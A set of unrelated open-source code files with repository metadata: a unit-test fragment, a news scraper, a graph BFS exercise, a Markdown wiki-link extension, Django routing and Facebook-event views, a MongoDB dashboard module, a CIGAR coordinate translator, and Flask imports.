            got = api.get_station_details(station_id, force_update=True)
            self.assertDictEqual(got, expected)
            assert api._call_api.call_count == 2  # forced update hits the API a second time
| BigCrunsh/home-monitoring | homemonitoring/tests/tankerkoenig_test.py | tankerkoenig_test.py | py | 2,091 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "homemonitoring.tankerkoenig.TankerKoenig",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "unittest.mock.patch",
"line_number": 21,
"usage_type": "call"
},
{
"ap... |
34928053014 | import requests
from bs4 import BeautifulSoup
import pandas as pd
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
import re
with open('raw_kaggle_huffpost.json', 'r') as file:
entries = file.read().lower().split("\n")
def create_cookies():
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options)
driver.get('https://www.huffpost.com/entry/immigrant-children-separated-from-parents_n_5b087b90e4b0802d69cb4070')
driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[4]/div/div[2]/form[1]/div/input').click()
cookies_list = driver.get_cookies()
cookies_dict = {}
for cookie in cookies_list:
cookies_dict[cookie['name']] = cookie['value']
return cookies_dict
def parse_response(response, new):
soup = BeautifulSoup(response.text, 'html.parser')
title = soup.find(attrs={"class": "headline__title"})
if title is not None:
title = title.getText()
else:
title = soup.find(attrs={"class": "headline"}).getText()
subtitle = soup.find(attrs={"class": "headline__subtitle"})
if subtitle is not None:
subtitle = subtitle.getText()
else:
subtitle = soup.find(attrs={"class": "dek"})
if subtitle is not None:
subtitle = subtitle.getText()
date = soup.find(attrs={"class": "timestamp"})
if date is not None:
date = date.getText().split()[0]
text = ""
paragraphs = soup.find_all(attrs={"class": "content-list-component yr-content-list-text text"})
if len(paragraphs) == 0:
paragraphs = soup.find_all(attrs={"class": "cli cli-text"})
for paragraph in paragraphs:
text += paragraph.getText()
text += '\n'
return {
'title': title,
'subtitle': subtitle,
'category': new['category'],
'text': text,
'date': date,
'url': url
}
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
cookies = create_cookies()
headers = {
'Referer': 'https://www.huffpost.com/entry/immigrant-children-separated-from-parents_n_5b087b90e4b0802d69cb4070',
'Sec-Fetch-Mode': 'no-cors',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
}
cached = pd.read_csv('datasets/cached_news.csv')
network = pd.read_csv('datasets/network_news.csv')
df = pd.concat([cached, network]).drop_duplicates().reset_index(drop=True)
df.to_csv('datasets/cached_news.csv', index=False)
network.iloc[0:0].to_csv('datasets/network_news.csv', index=False)
data_source = []
news = []
for entry in entries:
new = eval(entry)
if new['category'] in ['politics', 'entertainment', 'queer voices',
'business', 'comedy', 'sports', 'black voices',
'the worldpost', 'women', 'impact', 'crime', 'media',
'weird news', 'green', 'religion', 'science', 'world news',
'tech', 'arts & culture', 'latino voices', 'education']:
news.append(new)
index_from_network = 0
for i, new in enumerate(news):
if i % 50 == 0:
print(i, index_from_network, len(news))
url = new['link']
row = df[df.url == url]
if not row.empty:
continue
try:
index_from_network = index_from_network + 1
if re.match(regex, url) is None:
print('invalid url:', url)
continue
response = requests.get(url, headers=headers, cookies=cookies)
new = parse_response(response, new)
data_source.append(new)
if index_from_network % 100 == 0:
print('saving dataset', index_from_network)
pd.DataFrame(data_source).to_csv('datasets/network_news.csv', index=False)
except:
print('error when trying to process', url)
| the-super-toys/ml-there-will-be-news | fetch-dataset.py | fetch-dataset.py | py | 4,295 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 16,
"usage_type": "name"
},
{... |
14114648700 | import sys
from collections import deque
def bfs(node):
queue = deque()
queue.append(node)
visited[node] = True
while len(queue) != 0:
cur_node = queue.popleft()
for linked_node in adj[cur_node]:
if not visited[linked_node]:
visited[linked_node] = True
queue.append(linked_node)
if __name__ == "__main__":
N, M = map(int, sys.stdin.readline().split())
adj = [[] for _ in range(N + 1)]
visited = [False] * (N + 1)
for _ in range(M):
srt, end = map(int, sys.stdin.readline().split())
adj[srt].append(end)
adj[end].append(srt)
cnt = 0
for node in range(1, N + 1):
if not visited[node]:
bfs(node)
cnt += 1
print(cnt) | nashs789/JGAlgo | Week02/Q11724/Q11724_Inbok.py | Q11724_Inbok.py | py | 786 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline... |
25460261702 | import logging
from markdown.extensions import Extension
from markdown.inlinepatterns import Pattern
from markdown.util import etree
logger = logging.getLogger(__name__)
def build_url(label, base, end):
""" Build a url from the label, a base, and an end. """
return '%s%s%s' % (base, label, end)
def build_label(label):
return label.split('/')[-1]
def url_exists(url):
print("ORIGINAL URL")
return True
class WikiLinkExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {
'base_url': ['/', 'String to append to beginning or URL.'],
'end_url': ['/', 'String to append to end of URL.'],
'html_class': ['wikilink', 'CSS hook. Leave blank for none.'],
'build_url': [build_url, 'Callable that formats URL from label.'],
'build_label': [build_label, 'Callable that formats the label.'],
'url_exists': [url_exists,
'Callable that returns wether a URL exists']
}
super(WikiLinkExtension, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
# append to end of inline patterns
WIKILINK_RE = r'\[\[([A-Za-z0-9_ -/]+)\]\]'
wikilinkPattern = MDWikiLinks(WIKILINK_RE, self.getConfigs())
wikilinkPattern.md = md
md.inlinePatterns.add('mdwikilink', wikilinkPattern, "<not_strong")
class MDWikiLinks(Pattern):
def __init__(self, pattern, config):
super().__init__(pattern)
self.config = config
def handleMatch(self, m):
if m.group(2).strip():
a = etree.Element('a')
base_url, end_url, html_class = self._getMeta()
label = m.group(2).strip()
a.set('title', label)
url = self.config['build_url'](label, base_url, end_url)
label_short = self.config['build_label'](label)
a.set('href', url)
if not self.config['url_exists'](url):
a.set('class', 'missing')
a.text = label
else:
a.text = label_short
else:
a = ''
return a
def _getMeta(self):
""" Return meta data or config data. """
base_url = self.config['base_url']
end_url = self.config['end_url']
html_class = self.config['html_class']
if hasattr(self.md, 'Meta'):
if 'wiki_base_url' in self.md.Meta:
base_url = self.md.Meta['wiki_base_url'][0]
if 'wiki_end_url' in self.md.Meta:
end_url = self.md.Meta['wiki_end_url'][0]
if 'wiki_html_class' in self.md.Meta:
html_class = self.md.Meta['wiki_html_class'][0]
return base_url, end_url, html_class
| ghtyrant/mdwiki | mdwiki/backend/extensions/mdwikilinks.py | mdwikilinks.py | py | 2,780 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "markdown.extensions.Extension",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "markdown.inlinepatterns.Pattern",
"line_number": 48,
"usage_type": "name"
},
{
"ap... |
17411415924 | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from driver.views import (
home,
DriverAddView,
DetailDriverView,
ListDriverView,
UserCreationView,
FieldNumberAddView
)
from driver.forms import LoginForm
from qr_code import urls as qr_code_urls
from django.contrib.auth import views as auth_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', home,name="home"),
path('login/',auth_views.LoginView.as_view(template_name="driver/auth/login.html",form_class=LoginForm),name="login"),
path('signup/', UserCreationView.as_view(), name="signup"),
path('logout/',auth_views.LogoutView.as_view(template_name="driver/auth/logout.html"),name="logout"),
path('driver/add/',DriverAddView.as_view(), name="driver_add"),
path('driver/drivers/',ListDriverView.as_view(), name="driver_list"),
path('driver/<int:pk>/',DetailDriverView.as_view(), name="driver_detail"),
path('driver/<int:pk>/liscense/add/',FieldNumberAddView.as_view(), name="field_number"),
path('qr_code',include(qr_code_urls, namespace="qr_code"))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
| miyanda2/Driver-Qr | mysite/urls.py | urls.py | py | 2,046 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "django.contrib.admin.site",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "... |
27980503870 | #!/usr/bin/env python2
"""
Minimal Example
===============
Generating a square wordcloud from the US constitution using default arguments.
"""
from os import path
from wordcloud import WordCloud, STOPWORDS
d = path.dirname(__file__)
# Read the whole text.
text = open(path.join(d, 'titles.txt')).read()
# Generate a word cloud image
wordcloud = WordCloud(width=800, height=400,background_color="white", max_words=2000, margin=10,
stopwords=STOPWORDS.add("said"),max_font_size=40).generate(text)
# Display the generated image:
# the matplotlib way:
import matplotlib.pyplot as plt
plt.figure( figsize=(22,11) )
plt.imshow(wordcloud)
plt.axis("off")
plt.show()
# The pil way (if you don't have matplotlib)
#image = wordcloud.to_image()
#image.show() | schollz/scholar-pull | makeCloud.py | makeCloud.py | py | 769 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,... |
21476691969 | from urllib import quote
from django.shortcuts import get_object_or_404, render_to_response, redirect
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.models import User
from django.contrib.auth import logout
from django.core import mail
from django.core.validators import validate_email
from django import forms
from datetime import datetime
from events.models import *
import facebook
ical = \
"""BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
DTSTART:{0}
DTEND:{1}
SUMMARY:{2}
LOCATION:{3}
DESCRIPTION:{4}
URL;VALUE=URI:http://www.facebook.com/event.php?eid={5}
BEGIN:VALARM
TRIGGER:-PT15M
DESCRIPTION:QRAttend event reminder
ACTION:DISPLAY
END:VALARM
END:VEVENT
END:VCALENDAR
"""
# convenience method to avoid strange AttributeError
# complaining the facebook object has no attribute graph
def fb(request):
try:
return request.facebook.graph
except AttributeError:
return False
def logged_in(request):
return request.user.is_authenticated and request.user.is_active
# returns event object with added start_dt and end_dt parameters for convenience
def start_end(event):
event["start_dt"] = datetime.strptime(event["start_time"], "%Y-%m-%dT%H:%M:%S")
event["end_dt"] = datetime.strptime(event["end_time"], "%Y-%m-%dT%H:%M:%S")
return event
# custom render function, vars is a dictionary, request is the request object
def render(template, vars, request):
c = RequestContext(request)
if fb(request) and logged_in(request):
vars["me"] = fb(request).get_object("me")
return render_to_response(template, vars, context_instance=c)
def home(request):
if fb(request) and logged_in(request):
fbuser = fb(request).get_object("me")
events = fb(request).get_connections("me", "events")
real_events = []
now = datetime.now()
db_events = []
db_event_ids = []
for db_event in FacebookEvent.objects.filter(facebook_user_id=fbuser["id"]):
db_event_ids.append(db_event.facebook_event_id)
new_db_event = fb(request).get_object(db_event.facebook_event_id)
new_db_event = start_end(new_db_event)
db_events.append(new_db_event)
for event in events["data"]:
event = start_end(event)
if event["rsvp_status"] == u'attending' and event["start_dt"] > now:
new_event = fb(request).get_object(event["id"])
new_event = start_end(new_event)
if new_event["owner"]["id"] == fbuser["id"] and new_event["privacy"] == u'OPEN' and not new_event["id"] in db_event_ids:
real_events.append(new_event)
return render('events.html', {'me':fbuser, 'events':real_events, 'db_events':db_events}, request)
else:
return render('index.html', {}, request)
def logout_view(request):
logout(request)
return redirect(home)
def mobile(request, event_id):
c = RequestContext(request)
api = facebook.GraphAPI()
event = api.get_object(event_id)
event = start_end(event)
success = request.GET.__contains__('success')
return render('mobile.html', {'event':event, 'success':success}, request)
def event(request,event_id):
c = RequestContext(request)
try:
event_obj = FacebookEvent.objects.get(facebook_event_id=event_id)
except FacebookEvent.DoesNotExist:
if fb(request) and logged_in(request):
fbuser = fb(request).get_object("me")
fbevent = fb(request).get_object(event_id)
if fbevent["owner"]["id"]==fbuser["id"]: #create a QR code
event_obj = FacebookEvent(facebook_event_id=event_id,facebook_user_id=fbuser["id"])
event_obj.save()
if event_obj:
event = fb(request).get_object(event_id)
event = start_end(event)
return render('event.html', {'event_id':event_id,'event_obj':event}, request)
else:
return render('no_event.html', {}, request)
def email(request, event_id):
if request.method == "POST":
try:
addr = request.POST["email"].strip()
validate_email(addr)
api = facebook.GraphAPI()
event = api.get_object(event_id)
content = ical.format("".join("".join(event["start_time"].split("-")).split(":")),
"".join("".join(event["end_time"].split("-")).split(":")),
event["name"], event["location"], event["description"],
event["id"])
email = mail.EmailMessage('Event from QR Attend!', 'Hey there. Attached is the iCal event for {0}'.format(event["name"]),
to=[addr])
email.attach("fbevent.ics", content, "text/calendar")
email.send()
return redirect('/m/'+event_id+"?success")
except forms.ValidationError:
return redirect('/m/'+event_id+"/?email="+quote(addr))
| sherbondy/Attend | attend/events/views.py | views.py | py | 5,143 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name"... |
34082247012 | import traceback
import logger as log
import pandas as pd
from datetime import (
datetime
)
from database import (
DrugsMetaCollection,
IngredientsCollection,
LyophilizedCollection
)
from dash import (
html,
dcc
)
class MongoData(object):
def __init__(self):
self._ingredients_db_obj = None
self._lyophilized_db_obj = None
@property
def ingredients_db_obj(self):
if not self._ingredients_db_obj:
self._ingredients_db_obj = IngredientsCollection()
return self._ingredients_db_obj
@property
def lyophilized_db_obj(self):
if not self._lyophilized_db_obj:
self._lyophilized_db_obj = LyophilizedCollection()
return self._lyophilized_db_obj
def sanitize_list(self, item):
if not isinstance(item, list):
result = list()
result.append(item)
return result
return item
def get_table_data(self, start_date=None, end_date=None, product_search=None, active_search=None, inactive_search=None):
search_query = dict()
result = list()
if product_search:
result.extend(self.sanitize_list(product_search))
search_query.update({
'products': {'$in': result}
})
elif active_search:
result.extend(self.sanitize_list(active_search))
search_query.update({
'active_ingredients_list': {'$in': result}
})
elif inactive_search:
result.extend(self.sanitize_list(inactive_search))
search_query.update({
'inactive_ingredients_list': {'$in': result}
})
if not (start_date or search_query):
today = datetime.today()
start_date = datetime(today.year, today.month, 1)
##
## For Testing purposes, using start date from Jan 1, 2022.
##
start_date = datetime(2022, 1, 1)
search_query.update({'date': {'$gte': start_date}})
if end_date:
search_query['date'].update({
'$lt': end_date
})
records_rows = list()
record_id = None
try:
for records in self.lyophilized_db_obj.get_records(query=search_query):
record_id = records.get('_id')
labels_rows = list()
active_ingredients_rows = list()
active_strength_rows = list()
inactive_ingredients_rows = list()
inactive_strength_rows = list()
for setid, labels in records.get('set_ids', {}).items():
row = list()
active = records.get('active_ingredients', {}).get(setid, [])
inactive = records.get('inactive_ingredients', {}).get(setid, [])
active_len = len(active)
inactive_len = len(inactive)
row_span = max(active_len, max(inactive_len, 0))
if row_span == 0:
continue
row.append(dcc.Markdown(f"[{labels.get('title')}]({labels.get('web_url')})"))
row.append(row_span)
labels_rows.append(row)
for i in range(1, row_span):
labels_rows.append(list())
for i in range(0, row_span):
active_name_row = ["", 1]
active_strength_row = ["", 1]
inactive_name_row = ["", 1]
inactive_strength_row = ["", 1]
if i < active_len:
active_name_row = [active[i].get('name', ""), 1]
active_strength_row = [active[i].get('strength', ""), 1]
if i < inactive_len:
inactive_name_row = [inactive[i].get('name', ""), 1]
inactive_strength_row = [inactive[i].get('strength', ""), 1]
active_ingredients_rows.append(active_name_row)
active_strength_rows.append(active_strength_row)
inactive_ingredients_rows.append(inactive_name_row)
inactive_strength_rows.append(inactive_strength_row)
total_span = len(labels_rows)
if total_span <= 0:
total_span = 1
app_number = records.get('application_number')
app_list = [app_number, total_span]
product_outer_list = list()
for product in records.get('products', []):
product_rows = [product.upper(), html.Br()]
product_rows.append(app_number)
product_outer_list = [product_rows, total_span, "products"]
date_rows = list()
if not start_date:
date_value = list()
for date in records.get('date'):
date_value.append(date.strftime('%m-%d-%Y'))
date_value.append(html.Br())
else:
date_value = ""
for date in records.get('date'):
if date.year >= start_date.year and date.month >= start_date.month:
if end_date:
if date.year <= end_date.year and date.month <= end_date.month:
date_value = date.strftime('%m-%d-%Y')
break
else:
date_value = date.strftime('%m-%d-%Y')
break
date_rows = [date_value, total_span, "dates"]
company_rows = [records.get('company'), total_span]
current_row = [date_rows, product_outer_list, company_rows]
for i in range(0, len(labels_rows)):
if labels_rows[i]:
current_row.append(labels_rows[i])
current_row.extend([active_ingredients_rows[i], active_strength_rows[i]])
current_row.extend([inactive_ingredients_rows[i], inactive_strength_rows[i]])
records_rows.append(current_row)
current_row = list()
except Exception as exc:
log.do_error(f"Exception occurred while fetching records from database for record: {record_id}, error: {str(exc)}, traceback: {traceback.format_exc()}")
return records_rows
def get_search_bar_data(self):
products = set()
active_ingredients = set()
inactive_ingredients = set()
for records in self.lyophilized_db_obj.get_records():
products.update(set(records.get('products', [])))
active_ingredients.update(set(records.get('active_ingredients_list', [])))
inactive_ingredients.update(set(records.get('inactive_ingredients_list', [])))
return (list(products), list(active_ingredients), list(inactive_ingredients))
def generate_occurences_data(self):
try:
active_ingredients_dict = dict()
inactive_ingredients_dict = dict()
products_set = set()
for record in self.lyophilized_db_obj.get_records():
products = record.get('products', [])
active_ingredients = record.get('active_ingredients_list', [])
inactive_ingredients = record.get('inactive_ingredients_list', [])
date = record.get('date', [])[0]
date_value = date.strftime('%Y')
for product in products:
for ingredient in active_ingredients:
id = product + ingredient
if id not in products_set:
products_set.add(id)
existing_val = active_ingredients_dict.get(ingredient, {}).get(date_value, 0)
total_val = active_ingredients_dict.get(ingredient, {}).get('total_count', 0)
if active_ingredients_dict.get(ingredient):
active_ingredients_dict[ingredient].update({date_value: existing_val + 1})
active_ingredients_dict[ingredient].update({'total_count': total_val + 1})
else:
active_ingredients_dict[ingredient] = {}
active_ingredients_dict[ingredient].update({date_value: 1})
active_ingredients_dict[ingredient].update({'total_count': 1})
for ingredient in inactive_ingredients:
id = product + ingredient
if id not in products_set:
products_set.add(id)
existing_val = inactive_ingredients_dict.get(ingredient, {}).get(date_value, 0)
total_val = inactive_ingredients_dict.get(ingredient, {}).get('total_count', 0)
if inactive_ingredients_dict.get(ingredient):
inactive_ingredients_dict[ingredient].update({date_value: existing_val + 1})
inactive_ingredients_dict[ingredient].update({'total_count': total_val + 1})
else:
inactive_ingredients_dict[ingredient] = {}
inactive_ingredients_dict[ingredient].update({date_value: 1})
inactive_ingredients_dict[ingredient].update({'total_count': 1})
except Exception as exc:
log.do_error(f"Exception occurred while fetching ingredients from Database, error: {str(exc)}")
return {'active': active_ingredients_dict, 'inactive': inactive_ingredients_dict}
def get_timeseries_dataframe(self):
time_series_data = self.generate_occurences_data()
inactive_list = list()
inactive_ing_list = list()
active_list = list()
active_ing_list = list()
inactive_dates_list = list()
active_dates_list = list()
inactive_occ_list = list()
active_occ_list = list()
active_total_count = list()
inactive_total_count = list()
for ingredient, value in time_series_data.get('active', {}).items():
active_ing_list.append(ingredient)
for key, count in value.items():
if key == "total_count":
active_total_count.append(count)
else:
active_dates_list.append(int(key))
active_list.append(ingredient)
active_occ_list.append(count)
for ingredient, value in time_series_data.get('inactive', {}).items():
inactive_ing_list.append(ingredient)
for key, count in value.items():
if key == "total_count":
inactive_total_count.append(count)
else:
inactive_dates_list.append(int(key))
inactive_list.append(ingredient)
inactive_occ_list.append(count)
active_time_series = pd.DataFrame({
"Ingredient": active_list,
"Year": active_dates_list,
"Occurences": active_occ_list
})
inactive_time_series = pd.DataFrame({
"Ingredient": inactive_list,
"Year": inactive_dates_list,
"Occurences": inactive_occ_list
})
active_chart = pd.DataFrame({
"Ingredient": active_ing_list,
"Occurences": active_total_count
})
inactive_chart = pd.DataFrame({
"Ingredient": inactive_ing_list,
"Occurences": inactive_total_count
})
active_time_series = active_time_series.sort_values(by=['Year'])
inactive_time_series = inactive_time_series.sort_values(by=['Year'])
active_chart = active_chart.sort_values(by=['Occurences'])
inactive_chart = inactive_chart.sort_values(by=['Occurences'])
return (active_chart, inactive_chart, active_time_series, inactive_time_series) | ashwani1310/Lyophilized-Drugs-Analysis-Tool | ui_data.py | ui_data.py | py | 12,601 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "database.IngredientsCollection",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "database.LyophilizedCollection",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.today",
"line_number": 63,
"usage_type": "call"
},
{
... |
18909708203 | """
Description:
A tool for translating transcript coordinates to reference coordinates using the CIGAR string.
Contributors:
20210119 - Larry Clos II (drlclos@gmail.com)
Assumptions:
- For a given genetic sequence (transcript) the sequence coordinate and index are the same and start at zero (0).
- CIGAR defines the the order and size of transcript alignment events over the range of a padded reference string ,
but certain events may not map to unpadded reference coordinates.
- CIGAR operators are preceded by non-zero integers.
- CIGAR strings never start with an Insertion or Deletion operator.
- There is a 1:1 coordinate/index mapping for reference and transcript sequence strings in (mis)match event regions
(i.e. map between characters).
- There is not a 1:1 coordinate/index mapping for transcript regions not mapped to the unpadded reference (insertions)
or for reference regions missing from the transcript (deletions).
- If queried, transcript insertions or reference deletions should map to the closest upstream (mis)match position
(left-aligned) within the compared strand.
- A reference coordinate can be translated from a transcript coordinate query with the following formula:
<ref start position> + <transcript coordinate query> + sum(<relative indel event sizes in prior coordinates>)
Usage:
$python translate_coordinates.py <path to transcript alignments> <path to coordinate queries> <path to output file>
Test:
$python -m doctest -v translate_coordinates.py
"""
import csv
import re
import sys
from collections import namedtuple
from typing import List, Tuple, Union
# namedtuple for input transcripts is lightweight, memory efficient alternative to creating full class
Transcript = namedtuple('Transcript', 'name chromosome ref_start cigar transcript_length index_map')
def cigar_to_operators(cigar: str) -> List[Tuple[int, str]]:
"""Isolate individual CIGAR operators and their numeric values.
>>> cigar_to_operators('8M7D6M2I2M11D7M')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
>>> cigar_to_operators('X8M7D6M2I2M11D7M12')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
>>> cigar_to_operators('8M7D6M2I2M11D7M12Q')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
A list of tuples, each being (<size of alignment type (integer)>, <CIGAR operator code (string)>).
"""
re_cigar = list((int(c[:-1]), c[-1]) for c in re.findall(r'[0-9]+[MIDNSHP=X]', cigar))
return re_cigar
def get_length(cigar: str) -> int:
"""Deduce the length of a transcript from its CIGAR string.
>>> get_length('2M2X4M7D6M2I2M11D7M')
25
>>> get_length('2M2X4M7D6M2I2M11D7M12Q')
25
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
Integer value of the length of the transcript.
"""
re_cigar = cigar_to_operators(cigar)
length = sum(o[0] for o in re_cigar if o[1] not in ['D', 'N', 'H', 'P'])
return length
def make_index_map(cigar: str) -> List[Tuple[int, int]]:
"""
Transform CIGAR operators to an effective, efficient, and convenient data structure that maps the relative index of
CIGAR alignment events that alter the 1:1 correspondence of transcript and reference coordinates (indexes).
>>> make_index_map('8M7D6M2I2M11D7M')
[(7, 7), (13, -2), (17, 11)]
>>> make_index_map('2M2X4M7D6M2I2M11D7M')
[(7, 7), (13, -2), (17, 11)]
>>> make_index_map('2M2X2I2M')
[(3, -2)]
Design:
- The index map assumes the transcript coordinate and index are the same and start at zero (0).
- (Mis)matches don't alter index/coordinate map, hence need not be encoded, saving memory and computation.
- Index map entries have the index of a left-aligned indel event 'a', and the associated event size 'b'
such that:
- any query > 'a' must add 'b' to the reference coordinate.
- an insertion event has a negative 'b' to prevent advance of reference coordinate from transcript index.
- sum of all 'b's for entries whose 'a' < query gives the total coordinate adjustment for indel events.
- queries found in insertion regions need adjustment by amount of query index extending into region.
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
A list of tuples, each being...
(<index of position immediately prior to indel (left-aligned)>, <indel length a.k.a. coordinate adjust>).
"""
re_cigar = cigar_to_operators(cigar)
# TODO: can add model build for reference as well
transcript_index_map = []
ref_size = 0
trans_size = 0
for size, code in re_cigar:
if code in ['M', '=', 'X']:
ref_size += size
trans_size += size
continue
if code in ['D', 'N']:
ref_size += size
transcript_index_map.append((trans_size - 1, size))
elif code in ['I', 'S']:
transcript_index_map.append((trans_size - 1, -size))
trans_size += size
# TODO: consider nuance from other operators
return transcript_index_map
def translate_coordinate(coordinate_query: int,
index_map: List[Tuple[int, int]],
ref_start: int,
transcript_length: int) -> Union[int, None]:
"""Determine the reference coordinate (index) of input coordinate query from transcript index map and parameters.
>>> [translate_coordinate(n, [(7, 7), (13, -2), (17, 11)], 3, 25) for n in [0, 13, 14, 15, 16, 24]]
[3, 23, 23, 23, 24, 43]
Nothing should be returned from below...
>>> translate_coordinate(25, [(7, 7), (13, -2), (17, 11)], 3, 25)
Args:
coordinate_query: Transcript position (index) to traslate to reference coordinate.
index_map: A list of tuples, each being...
(<index of position immediately prior to indel (left-aligned)>, <indel length>).
ref_start: Reference position that aligns with transcript index 0.
transcript_length: Length of transcript.
Returns:
Reference coordinate, or None when query outside of transcript index range.
"""
# Confirm query is possible with given transcript length
if coordinate_query >= transcript_length or coordinate_query < 0:
return None
# Calculate reference coordinate for query
mapped_adjusts = list(a for a in index_map if coordinate_query > a[0])
ref_coord = sum([ref_start,
coordinate_query,
sum(a[1] for a in mapped_adjusts)])
# Adjust insertions to return left-aligned reference coordinate
if mapped_adjusts and mapped_adjusts[-1][1] < 0:
last_adjust = mapped_adjusts[-1]
diff = last_adjust[0] - coordinate_query - last_adjust[1]
if diff > 0:
ref_coord += diff
return ref_coord
def main(transcripts: str, queries: str, output: str) -> None:
    """Translate input transcript coordinate queries to reference coordinates (all 0-based).

    Args:
        transcripts: Path to input TSV file containing the transcripts, with columns for transcript name,
            chromosome, starting position, and CIGAR mapping string.
        queries: Path to input TSV file with a set of queries, with columns for transcript name and
            transcript coordinate to translate to reference coordinate.
        output: Path to output TSV file to write query results, with columns for transcript name,
            transcript coordinate, chromosome, and reference coordinate determined from query.

    Raises:
        ValueError: when a query coordinate is outside its transcript's index range.
        KeyError: when a query names a transcript absent from the transcripts file.
    """
    # Parse inputs and preprocessing (precompute reused parameters per transcript).
    transcript_alignments = {}
    with open(transcripts, 'r') as f:
        # Stream rows directly; wrapping the reader in list() only built a
        # throwaway copy of the whole file (PERF101).
        for t in csv.reader(f, delimiter='\t'):
            transcript_alignments[t[0]] = Transcript(name=t[0],
                                                     chromosome=t[1],
                                                     ref_start=int(t[2]),
                                                     cigar=t[3],
                                                     transcript_length=get_length(t[3]),
                                                     index_map=make_index_map(t[3]))
    with open(queries, 'r') as q:
        raw_queries = list(csv.reader(q, delimiter='\t'))

    # Process queries and write one TSV result row per query.
    with open(output, 'w', newline='') as w:
        query_output = csv.writer(w, delimiter='\t')
        for transcript_name, query in raw_queries:
            query = int(query)
            transcript = transcript_alignments[transcript_name]
            ref_coord = translate_coordinate(coordinate_query=query,
                                             index_map=transcript.index_map,
                                             ref_start=transcript.ref_start,
                                             transcript_length=transcript.transcript_length)
            if ref_coord is None:
                raise ValueError(f'Transcript {transcript_name} has no coordinate (index) {query}')
            query_output.writerow([transcript_name, query, transcript.chromosome, ref_coord])
if __name__ == '__main__':
    """Execute translate_coordinates module from CLI."""
    # CLI usage: <transcripts.tsv> <queries.tsv> <output.tsv>
    main(*sys.argv[1:])
    # Self-check the module's doctest examples after a successful run.
    import doctest
    doctest.testmod()
| LClos/bfx_tools | genetic_coordinates/cigar_translate.py | cigar_translate.py | py | 9,659 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.namedtuple",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"lin... |
9353725368 | import os
import atexit
import dotenv
from dotenv import load_dotenv
from flask import Flask
